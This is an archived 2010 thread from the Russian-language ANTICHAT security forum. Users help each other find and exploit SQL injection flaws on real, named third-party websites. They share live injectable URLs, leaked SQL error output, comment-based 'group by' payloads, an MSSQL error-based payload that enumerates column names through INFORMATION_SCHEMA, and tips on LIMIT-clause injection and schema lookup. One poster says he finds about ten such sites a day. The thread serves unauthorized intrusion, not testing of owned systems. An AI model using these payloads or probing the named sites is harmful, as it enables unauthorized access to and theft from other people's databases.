ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.08.2010, 18:00
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
подскажите пожалуйста, тут инъекция или что-то на нее похожее?
http://nudistavenue.com/browse/all/18-20%27/all
|
|
|
30.08.2010, 19:27
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от NorB
NorB said:
все равно фильтрует=\ эт значит уязвимости нету?
C чего ты взял, что фильтрует? В первом примере твоем никакой фитьтрации я не вижу. Что выдается при %20 или /**/ ?
|
|
|
|
30.08.2010, 20:55
|
|
Познающий
Регистрация: 20.07.2007
Сообщений: 99
Провел на форуме:
1562993
Репутация:
25
|
|
Сообщение от попугай
попугай said:
C чего ты взял, что фильтрует? В первом примере твоем никакой фитьтрации я не вижу. Что выдается при %20 или /**/ ?
Вылазит тоже самое только c %20
SELECT DISTINCT a.ad_id, a.house_ad,a.url,b.filePath FROM advertising a, tddmadmin_file b WHERE a.date_start = now() AND a.status = 'active' AND a.adpage = 'knowledge_center_overview.php?type=2'%20group%20b y%209999%20--%20' AND a.fileid = b.fileID [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20' AND a.fileid = b.fileID' at line 5]
как видно из запроса мой запрос как параметр передается и комментарий в конце не сканывает поэтому невыполняется, а если кавычку перед запросам убрать то там идет перенаправленние на главную страницу сразу
хм при /**/ тоже перенаправляет на главную страницу.
Карочи вот сайт http://www.wi-fi.org/knowledge_center_overview.php?type=2'
расскажи че там как я просто учусь) за день штук 10 таких бывает)
О и еше вопрос как проверить к какой бд принадлежит таблица если я знаю ее имя.
|
|
|
|
30.08.2010, 23:09
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от NorB
NorB said:
О и еше вопрос как проверить к какой бд принадлежит таблица если я знаю ее имя.
Если версия mysql > 5, то можно узнать наверняка
select table_schema from informashion_schema.tables where table_name='your_table';
Если такой возможности нет, то удостовериться сделав запрос из этой таблицы, назвав предполагаемую базу:
select * from предполагаемая_база.your_table;
ошибки нет - значит предположение верно
|
|
|
|
31.08.2010, 13:48
|
|
Познающий
Регистрация: 20.07.2007
Сообщений: 99
Провел на форуме:
1562993
Репутация:
25
|
|
blablabla.php?start=16600+group+by+2+--+
ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group by 2 -- ,40' at line 1
как бороться с этим ,40
почему то не комментируется...
mr.celt - спс
|
|
|
|
31.08.2010, 14:16
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Сообщение от NorB
NorB said:
blablabla.php?start=16600+group+by+2+--+
ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group by 2 -- ,40' at line 1
как бороться с этим
,40
почему то не комментируется...
mr.celt - спс
А это не в Limit ли скуля? можешь попробовать /*
но что то мне подсказывает, что это скуля в limit...
|
|
|
|
31.08.2010, 14:48
|
|
Познающий
Регистрация: 20.07.2007
Сообщений: 99
Провел на форуме:
1562993
Репутация:
25
|
|
Сообщение от kfor
kfor said:
А это не в Limit ли скуля? можешь попробовать /*
но что то мне подсказывает, что это скуля в limit...
Ну похоже ты прав. Можно ли лимит обойти подзапросом или както еще?
|
|
|
|
31.08.2010, 14:57
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791
Репутация:
265
|
|
Сообщение от NorB
NorB said:
Ну похоже ты прав. Можно ли лимит обойти подзапросом или както еще?
Что именно ты хочешь вывести?
Скинь сюда свою скулю, посмотрим что можно сделать.
|
|
|
|
31.08.2010, 14:58
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
(MSSQL) Что не так с запросом?
Код:
Code:
1' or 1=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='pass')--
пытаюсь вытянуть имена колонок определенной таблицы, но выводятся колонки всех таблиц (ну т.е. какую бы таблицу не указал, выводятся одни и те же колонки).. вроде бы понятно объяснил |
|
|
|
31.08.2010, 15:09
|
|
Познающий
Регистрация: 20.07.2007
Сообщений: 99
Провел на форуме:
1562993
Репутация:
25
|
|
Сообщение от stepashka_
stepashka_ said:
Что именно ты хочешь вывести?
Скинь сюда свою скулю, посмотрим что можно сделать.
http://tradebanging.com/community.php?start=-166000
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
